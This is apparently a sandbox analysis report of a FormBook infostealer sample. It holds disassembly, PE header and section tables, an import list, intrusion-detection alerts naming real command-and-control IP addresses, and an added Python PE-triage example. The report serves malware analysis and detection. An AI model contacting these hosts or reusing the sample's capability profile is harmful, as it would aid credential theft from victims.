                                                                                                                  mov ebp, esp
                                                                                                                  push edi
                                                                                                                  push esi
                                                                                                                  mov esi, dword ptr [ebp+0Ch]
                                                                                                                  mov ecx, dword ptr [ebp+10h]
                                                                                                                  mov edi, dword ptr [ebp+08h]
                                                                                                                  mov eax, ecx
                                                                                                                  mov edx, ecx
                                                                                                                  add eax, esi
                                                                                                                  cmp edi, esi
                                                                                                                  jbe 00007F4B8CC4CABAh
                                                                                                                  cmp edi, eax
                                                                                                                  jc 00007F4B8CC4CC56h
                                                                                                                  cmp ecx, 00000080h
                                                                                                                  jc 00007F4B8CC4CACEh
                                                                                                                  cmp dword ptr [004A9724h], 00000000h
                                                                                                                  je 00007F4B8CC4CAC5h
                                                                                                                  push edi
                                                                                                                  push esi
                                                                                                                  and edi, 0Fh
                                                                                                                  and esi, 0Fh
                                                                                                                  cmp edi, esi
                                                                                                                  pop esi
                                                                                                                  pop edi
                                                                                                                  jne 00007F4B8CC4CAB7h
                                                                                                                  jmp 00007F4B8CC4CE92h
                                                                                                                  test edi, 00000003h
                                                                                                                  jne 00007F4B8CC4CAC6h
                                                                                                                  shr ecx, 02h
                                                                                                                  and edx, 03h
                                                                                                                  cmp ecx, 08h
                                                                                                                  jc 00007F4B8CC4CADBh
                                                                                                                  rep movsd
                                                                                                                  jmp dword ptr [00416740h+edx*4]
                                                                                                                  mov eax, edi
                                                                                                                  mov edx, 00000003h
                                                                                                                  sub ecx, 04h
                                                                                                                  jc 00007F4B8CC4CABEh
                                                                                                                  and eax, 03h
                                                                                                                  add ecx, eax
                                                                                                                  jmp dword ptr [00416654h+eax*4]
                                                                                                                  jmp dword ptr [00416750h+ecx*4]
                                                                                                                  nop
                                                                                                                  jmp dword ptr [004166D4h+ecx*4]
                                                                                                                  nop
                                                                                                                  inc cx
                                                                                                                  add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                  inc cx
                                                                                                                  add byte ptr [ebx], ah
                                                                                                                  ror dword ptr [edx-75F877FAh], 1
                                                                                                                  inc esi
                                                                                                                  add dword ptr [eax+468A0147h], ecx
                                                                                                                  add al, cl
                                                                                                                  jmp 00007F4B8F0C52B7h
                                                                                                                  add esi, 03h
                                                                                                                  add edi, 03h
                                                                                                                  cmp ecx, 08h
                                                                                                                  jc 00007F4B8CC4CA7Eh
                                                                                                                  rep movsd
                                                                                                                  jmp dword ptr [00000000h+edx*4]
                                                                                                                  Programming Language:
                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                  • [C++] VS2010 SP1 build 40219
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                  • [ASM] VS2010 SP1 build 40219
                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                  • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
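The section table reports a per-section MD5, 8-bit entropy and "ZLIB Complexity" but not how they are derived. The following is an added example, not Joe Sandbox code, that parses a PE32 section table with the Python standard library, recomputes those metrics, decodes the IMAGE_SCN_* characteristics and measures the overlay. Assumptions: ZLIB Complexity is taken as compressed size divided by raw size (consistent with the values above 1.0 that the tiny RT_GROUP_ICON resources show, but not confirmed by the page); the demo image built by build_sample_pe() is constructed inline with two sections and no optional header, and the names parse_pe, triage and build_sample_pe are this example's own. The overlay check matters for this file: the four raw sizes total 0x9e400 bytes (648,192) against a file size of 1'402'195 bytes, so roughly 750 KB sits outside the section table, and the whole-file entropy (7.56) exceeds every section's (at most 6.68 for .text).

```python
import hashlib
import math
import struct
import zlib

# IMAGE_SCN_* characteristic bits from the PE/COFF specification
SCN_FLAGS = (
    ("IMAGE_SCN_CNT_CODE", 0x00000020),
    ("IMAGE_SCN_CNT_INITIALIZED_DATA", 0x00000040),
    ("IMAGE_SCN_CNT_UNINITIALIZED_DATA", 0x00000080),
    ("IMAGE_SCN_MEM_EXECUTE", 0x20000000),
    ("IMAGE_SCN_MEM_READ", 0x40000000),
    ("IMAGE_SCN_MEM_WRITE", 0x80000000),
)


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for empty input, 8.0 for uniform."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Assumed definition of 'ZLIB Complexity': compressed size / raw size.
    Exceeds 1.0 for tiny or incompressible input because of zlib framing."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def parse_pe(pe: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (_machine, nsect, _stamp, _symptr, _nsyms,
     opt_size, _chars) = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size  # section headers follow the optional header
    sections, data_end = [], 0
    for i in range(nsect):
        (name, vsize, va, rawsize, rawptr, _relptr, _linptr,
         _nrel, _nlin, flags) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        data = pe[rawptr:rawptr + rawsize]
        data_end = max(data_end, rawptr + rawsize)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "rawsize": rawsize,
            "md5": hashlib.md5(data).hexdigest(),
            "zlib": zlib_complexity(data),
            "entropy": shannon_entropy(data),
            "flags": [n for n, bit in SCN_FLAGS if flags & bit],
        })
    # Bytes past the last section's raw data are an overlay the loader never maps
    return {"sections": sections, "overlay": pe[data_end:]}


def triage(pe: bytes) -> list:
    """Findings a first-pass analyst would flag from the section table alone."""
    info = parse_pe(pe)
    findings = []
    for s in info["sections"]:
        if s["entropy"] > 7.0:
            findings.append(f"{s['name']}: entropy {s['entropy']:.2f}, likely packed or encrypted")
        if {"IMAGE_SCN_MEM_WRITE", "IMAGE_SCN_MEM_EXECUTE"} <= set(s["flags"]):
            findings.append(f"{s['name']}: writable and executable")
    if info["overlay"]:
        findings.append(f"overlay: {len(info['overlay'])} bytes after the last section")
    return findings


def build_sample_pe() -> bytes:
    """Constructed demo image (not the analysed sample): two sections, no optional
    header (SizeOfOptionalHeader = 0; real images have one) and a 100-byte overlay."""
    text = bytes(range(16)) * 32                      # 512 bytes, entropy exactly 4.0
    packed, block = b"", b"seed"
    while len(packed) < 512:                          # deterministic pseudo-random bytes
        block = hashlib.sha256(block).digest()
        packed += block
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)              # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x0102)     # i386, 2 sections

    def hdr(name, va, size, rawptr, flags):
        return struct.pack("<8sIIIIIIHHI", name, size, va, size, rawptr, 0, 0, 0, 0, flags)

    table = (hdr(b".text", 0x1000, 0x200, 0x200, 0x60000020)        # CODE|EXECUTE|READ
             + hdr(b".packed", 0x2000, 0x200, 0x400, 0xE0000040))   # INIT_DATA|EXECUTE|READ|WRITE
    headers = dos + b"PE\0\0" + coff + table
    headers += b"\0" * (0x200 - len(headers))
    return headers + text + packed + b"O" * 100


if __name__ == "__main__":
    for s in parse_pe(build_sample_pe())["sections"]:
        print(f"{s['name']:<8} va={s['va']:#x} raw={s['rawsize']:#x} md5={s['md5']} "
              f"entropy={s['entropy']:.3f} zlib={s['zlib']:.3f} {', '.join(s['flags'])}")
    for line in triage(build_sample_pe()):
        print("finding:", line)
```

To run it against a real file, pass `open(path, "rb").read()` to triage(); compare the per-section MD5 and entropy with the table above to confirm the parser is reading the same bytes the sandbox hashed.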
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
                                                                                                                  DLLImport
                                                                                                                  WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                  VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                  COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                  MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                  PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                  USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                  KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, 
CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll: GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll: DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll: DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll: VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-08T15:37:51.503796+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49863 | 44.213.25.70 | 80 | TCP
2024-10-08T15:37:51.503796+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49863 | 44.213.25.70 | 80 | TCP
2024-10-08T15:38:08.600828+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49956 | 206.119.82.134 | 80 | TCP
2024-10-08T15:38:10.550616+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49973 | 206.119.82.134 | 80 | TCP
2024-10-08T15:38:13.144831+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49978 | 206.119.82.134 | 80 | TCP
2024-10-08T15:38:15.642976+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49979 | 206.119.82.134 | 80 | TCP
2024-10-08T15:38:15.642976+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49979 | 206.119.82.134 | 80 | TCP
2024-10-08T15:38:21.384116+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49980 | 67.223.117.189 | 80 | TCP
2024-10-08T15:38:23.946554+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49981 | 67.223.117.189 | 80 | TCP
2024-10-08T15:38:26.501962+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49982 | 67.223.117.189 | 80 | TCP
2024-10-08T15:38:29.065298+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49983 | 67.223.117.189 | 80 | TCP
2024-10-08T15:38:29.065298+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49983 | 67.223.117.189 | 80 | TCP
2024-10-08T15:38:42.752643+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49984 | 3.33.130.190 | 80 | TCP
2024-10-08T15:38:45.280121+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49985 | 3.33.130.190 | 80 | TCP
2024-10-08T15:38:47.853763+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49986 | 3.33.130.190 | 80 | TCP
2024-10-08T15:38:50.414469+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49987 | 3.33.130.190 | 80 | TCP
2024-10-08T15:38:50.414469+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49987 | 3.33.130.190 | 80 | TCP
2024-10-08T15:38:56.866137+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49988 | 183.181.83.131 | 80 | TCP
2024-10-08T15:38:59.367057+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49989 | 183.181.83.131 | 80 | TCP
2024-10-08T15:39:02.344376+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49990 | 183.181.83.131 | 80 | TCP
2024-10-08T15:39:04.853667+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49991 | 183.181.83.131 | 80 | TCP
2024-10-08T15:39:04.853667+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49991 | 183.181.83.131 | 80 | TCP
2024-10-08T15:39:11.019411+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49992 | 38.47.232.196 | 80 | TCP
2024-10-08T15:39:13.570786+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49993 | 38.47.232.196 | 80 | TCP
2024-10-08T15:39:16.163311+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49994 | 38.47.232.196 | 80 | TCP
2024-10-08T15:39:18.595077+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49995 | 38.47.232.196 | 80 | TCP
2024-10-08T15:39:18.595077+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49995 | 38.47.232.196 | 80 | TCP
2024-10-08T15:39:25.036234+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49996 | 3.33.130.190 | 80 | TCP
2024-10-08T15:39:26.658843+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49997 | 3.33.130.190 | 80 | TCP
2024-10-08T15:39:29.175267+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49998 | 3.33.130.190 | 80 | TCP
2024-10-08T15:39:34.811433+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49999 | 3.33.130.190 | 80 | TCP
2024-10-08T15:39:34.811433+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49999 | 3.33.130.190 | 80 | TCP
2024-10-08T15:39:41.168002+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50000 | 154.212.219.2 | 80 | TCP
2024-10-08T15:39:43.739751+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50001 | 154.212.219.2 | 80 | TCP
2024-10-08T15:39:46.492376+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50002 | 154.212.219.2 | 80 | TCP
2024-10-08T15:39:48.799063+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50003 | 154.212.219.2 | 80 | TCP
